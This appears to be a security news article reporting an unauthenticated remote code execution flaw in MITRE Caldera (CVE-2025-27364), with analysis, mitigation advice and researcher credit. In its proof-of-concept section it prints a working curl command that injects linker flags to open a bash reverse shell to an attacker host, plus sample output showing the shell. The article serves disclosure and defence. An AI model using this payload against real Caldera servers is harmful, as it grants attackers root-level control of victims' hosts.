Wednesday, May 7, 2025
HomeCVE/vulnerabilityCritical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

Critical RCE Vulnerability in MITRE Caldera – Proof of Concept Released

Published on

SIEM as a Service

Follow Us on Google News

A critical remote code execution (RCE) vulnerability has been uncovered in MITRE Caldera, a widely used adversarial emulation framework.

The flaw (CVE-2025-27364) affects all versions prior to commit 35bc06e, potentially exposing systems running Caldera servers to unauthenticated attacks.

Attackers can exploit this vulnerability by abusing dynamic compilation features in Caldera’s Sandcat and Manx agents, leading to arbitrary command execution on the host machine.

- Advertisement - Google News

MITRE has released patches urging immediate updates to versions v5.1.0 or newer.

Technical Analysis of the Vulnerability

The vulnerability stems from insufficient input sanitization in Caldera’s agent compilation process.

Caldera dynamically generates Sandcat and Manx agents—lightweight implants designed to execute commands during cybersecurity exercises.

These agents are compiled on-the-fly using user-supplied parameters passed via HTTP headers. While this flexibility aids red team operations, it inadvertently introduced a dangerous attack surface.

Dynamic Compilation and Command Injection

The compilation workflow involves a Go-based function (compile_go()) that processes linker flags (ldflags) from incoming requests.

Although Caldera’s code uses subprocess.check_output() without shell=True—a practice that typically mitigates shell injection—the subsequent handling of ldflags proved risky.

Attackers can manipulate these flags to hijack the compiler’s external linker configuration, ultimately leading to arbitrary code execution.

Simple Command Injection
Simple Command Injection

Key to the exploit is the -wrapper flag in GCC, which allows specifying a program to wrap subprocess calls.

By setting -extld=gcc and appending -wrapper with a malicious command (e.g., python3 -c ‘…’), attackers bypass Caldera’s security controls.

This technique exploits the server’s dependencies (Go, Python, GCC) to execute payloads directly on the host.

CVE-2025-27364 Details

  • CVE ID: CVE-2025-27364
  • CVSS Score: 9.8 (Critical)
  • Affected Versions: All Caldera versions prior to commit 35bc06e
  • Patch: Upgrade to Caldera v5.1.0+ or apply commit 35bc06e
  • Attack Vector: Remote, unauthenticated
  • Impact: Full system compromise via RCE

The vulnerability was discovered by security researcher Dawid Kulikowski, who reported it through MITRE’s coordinated disclosure process.

Running go tool link returns

MITRE has credited Kulikowski for his findings and emphasized the importance of community-driven security collaboration.

Proof of Concept (PoC)

The following curl command demonstrates exploitability by triggering a reverse shell on the Caldera server:

curl -X POST http://<caldera-server>:8888/file/compile \ 

-H "X-Request-Hash: arbitrary" \ 

-H "X-Goos: linux" \ 

-H "X-Goarch: amd64" \ 

-H "X-Ldflags: -extld=gcc -wrapper python3,-c,import os;os.system(\"bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'\")"

Successful exploitation results in the Caldera server executing the embedded Python script, granting attackers a reverse shell with root privileges.

Researchers observed the following output on a compromised server during testing:

... 

# Compilation command: go build -ldflags "... -extld=gcc -wrapper python3,-c,import os;os.system(\"bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'\")" 

# Reverse shell connection established from 10.0.0.1:4444

Mitigation and Recommendations

MITRE has issued an urgent advisory recommending the following actions:

  1. Immediate Upgrade: Update Caldera to v5.1.0 or later, which restricts linker flag modifications and validates compilation parameters.
  2. Network Segmentation: Isolate Caldera servers from sensitive environments to limit lateral movement.
  3. Dependency Hardening: Remove unnecessary build tools (e.g., GCC) from production systems where Caldera operates.

Organizations leveraging Caldera for training or testing should audit their instances for signs of exploitation, including unexpected processes or network connections originating from Caldera hosts.

CVE-2025-27364 underscores the risks of dynamic code generation in defensive tools, highlighting how attacker-controlled parameters can cascade into systemic failures.

MITRE’s rapid response sets a precedent for open-source project maintenance, but administrators must remain vigilant.

As adversarial emulation platforms grow in complexity, continuous security reviews of their codebases and dependencies will be critical to preventing similar vulnerabilities.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

SpyCloud Analysis Reveals 94% of Fortune 50 Companies Have Employee Data Exposed in Phishing Attacks

SpyCloud, the leading identity threat protection company, today released an analysis of nearly 6...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...